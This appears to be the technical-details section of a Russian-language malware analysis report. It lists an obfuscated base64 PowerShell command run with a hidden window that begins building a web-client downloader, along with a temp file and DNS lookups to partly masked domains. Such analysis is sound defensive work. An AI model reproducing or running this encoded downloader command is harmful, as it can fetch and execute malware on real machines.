Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpAEEAUQBBAEMARAA9ACgAJwBTAEQAUQBEACcAKwAnAEEAQQAnACsAJwBCAGMAJwApADsAJAByAEEAQQBVAF8AQQBBAD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1556
- %TEMP%\801174.cvr
- DNS ASK da####talleys.com
- DNS ASK pe####liotar.com
- DNS ASK pe###sports.com
- DNS ASK ne####mixnews.com
- DNS ASK fi###rbling.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpAEEAUQBBAEMARAA9ACgAJwBTAEQAUQBEACcAKwAnAEEAQQAnACsAJwBCAGMAJwApADsAJAByAEEAQQBVAF8AQQBBAD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AD...' (со скрытым окном)